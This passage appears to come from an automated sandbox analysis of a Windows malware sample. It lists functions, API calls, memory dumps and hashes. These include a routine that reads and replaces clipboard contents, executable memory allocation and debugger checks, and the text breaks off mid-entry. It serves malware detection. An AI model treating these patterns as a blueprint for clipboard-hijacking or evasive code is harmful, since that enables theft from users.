Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 009BB025 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009BB076

Memory Dump Source

Source File: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, Offset: 009BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ba000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 4cc3ddc033a05aed7b5a182f550953b4d46242bfe524d62016cc217289326633
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 1E113F79A00208EFDB01DF98CA85E99BFF5AF08350F058094F9489B361D371EA50DF80

Non-executed Functions

Function 02481942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0248194D
Sleep.KERNEL32(00001541), ref: 02481957

Part of subcall function 0248CE77: _strlen.LIBCMT ref: 0248CE8E

OpenClipboard.USER32(00000000), ref: 02481984
GetClipboardData.USER32(00000001), ref: 02481994
_strlen.LIBCMT ref: 024819B0
_strlen.LIBCMT ref: 024819DF
_strlen.LIBCMT ref: 02481B23
EmptyClipboard.USER32 ref: 02481B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 02481B46
GlobalUnlock.KERNEL32(00000000), ref: 02481B70
SetClipboardData.USER32(00000001,00000000), ref: 02481B79
GlobalFree.KERNEL32(00000000), ref: 02481B80
CloseClipboard.USER32 ref: 02481BA4
Sleep.KERNEL32(000002D2), ref: 02481BAF

Strings

i, xrefs: 024819C0
4#E, xrefs: 0248195D

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: b978c31468590a52dea869d75f85652d3b4ea07be727883c63709c40da631531
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: 4A512431C107949AD311AFA4EC45BFD7774FF2A306F04522BD809A6162EB709686CB69

Function 02482361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0248239C
GetClientRect.USER32(?,?), ref: 024823B1
GetDC.USER32(?), ref: 024823B8
CreateSolidBrush.GDI32(00646464), ref: 024823CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024823EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0248240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 02482416
MulDiv.KERNEL32(00000008,00000000), ref: 0248241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02482443
SetBkMode.GDI32(?,00000001), ref: 024824CE
_wcslen.LIBCMT ref: 024824E6

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: a22004ffb4fdee9840a3042c472ed11f56d2906c634f0ab78efc99f85b126369
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: 3571FD72910228AFDB22DF68DD85FAEB7BCEB09711F0041A5F509E6151DA70AF84CF24

Function 024BB9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024BBCF4,?,00000000), ref: 024BBA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024BBCF4,?,00000000), ref: 024BBA97
GetACP.KERNEL32(?,?,024BBCF4,?,00000000), ref: 024BBAAC

Strings

OCP, xrefs: 024BBA29
ACP, xrefs: 024BB9F3

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 45e7fa293ae2789865667484da2b8d3858e9d66a8975e282e1cd3e857f922556
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: CE217732E01105AAD7368F55D901BE777A6EF4AE5CB568066ED09D7300F732DA81C370

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

ACP, xrefs: 0043B78C
OCP, xrefs: 0043B7C2

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 024BBBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

Part of subcall function 024B2141: _free.LIBCMT ref: 024B21A0
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024BBCB5
IsValidCodePage.KERNEL32(00000000), ref: 024BBD10
IsValidLocale.KERNEL32(?,00000001), ref: 024BBD1F
GetLocaleInfoW.KERNEL32(?,00001001,024B0A1C,00000040,?,024B0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024BBD67
GetLocaleInfoW.KERNEL32(?,00001002,024B0A9C,00000040), ref: 024BBD86

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: 4421b78951f844526118e4bf4ae57a2b92a464ca9a4a4e065be02a0366c3c33b
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: F45170719002099AEB12DFA5DC40AFFB7B9EF1470AF14042FED04E7290EB719A458BB1

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EF48, 0042ED32, 0042EBC1
C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 024BB271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024B0A23,?,?,?,?,024B047A,?,00000004), ref: 024BB353
_wcschr.LIBVCRUNTIME ref: 024BB3E3
_wcschr.LIBVCRUNTIME ref: 024BB3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024B0A23,00000000,024B0B43), ref: 024BB494

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: 3e2dc4b3e3bc5437148a8995ba2605b51944cf371a231a3a81260aeb0f76472d
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: 2C61A371A10606AADB26AB75DC45BFB73A9FF04718F14442FED099B280EBB4D541CBB0

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 024AA63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0248DAD7), ref: 024AA732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0248DAD7), ref: 024AA73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0248DAD7), ref: 024AA749

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: c90aa944017c9d2be00a89346e304bdbf72c33aae30d3cec3e4f8b656447afc0
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: 4E31C57590132C9BCB21DF69DD88B9DBBB8BF18710F5042EAE40CA7260E7309B858F44

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 024B00C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,024B009C,00000000,00457970,0000000C,024B01F3,00000000,00000002,00000000), ref: 024B00E7
TerminateProcess.KERNEL32(00000000,?,024B009C,00000000,00457970,0000000C,024B01F3,00000000,00000002,00000000), ref: 024B00EE
ExitProcess.KERNEL32 ref: 024B0100

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 95932424b35fdc48ef32caea22904eb5f79d0b41f21831d588972a229f0582b9
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: 59E04631000148ABCF126F58DD48A8A3B6AEF02B43F008029F9048B230CB36DA42DE60

Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 0248092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 024809DC, 024809DF, 024809E4
., xrefs: 0248095F
l, xrefs: 02480966

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 8cdf4942245fb07499dfcbfde2d2b629970e6a449e81b357afbaf2dd344a87d1
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 1A314AB6920609DFDB11DF99C880AAEBBF9FF48324F15504AD841A7310D771EA49CFA4

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 024AED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: 2217916c504f1f1d1b273bf3e4caba0a0b36402970917dedf2fb6aebb3c01604
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: C7022D71E012199FDF14CFA9C9906AEBBF1EF98314F15826AD919E7380D731A945CF80

Function 02482605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0248262C
PostQuitMessage.USER32(00000000), ref: 024827CA

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: f0261b97a0c40fe91b5043467f19790d747a5e6a9800cc3e9b6adf87d4469498
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 07412125964384A5E731FFA5BC45B2637B0FF64B26F10252BD528CB2B2E3B28540C75E

Function 024B6F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024B6F21,?,?,00000008,?,?,024BF3E2,00000000), ref: 024B7153

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 2c4f3313a7d70be27a4a72d45cf7591d85ca2a479e0586fbe5880f57e6a85a08
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 00B150325106089FD716CF28C486BA5BBE1FF45368F25865AE89ACF3A1C335D992CF50

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 024BB8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

Part of subcall function 024B2141: _free.LIBCMT ref: 024B21A0
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024BB900

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: 3e58ed383412d02b6093fc32fb4da5b0817d2288ecdfd0a8e0b2537ca30c963a
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: ED218E3295020AABDF26AE29DC41BFA77ADEF08318F10017BED01D6250EB799945CB60

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

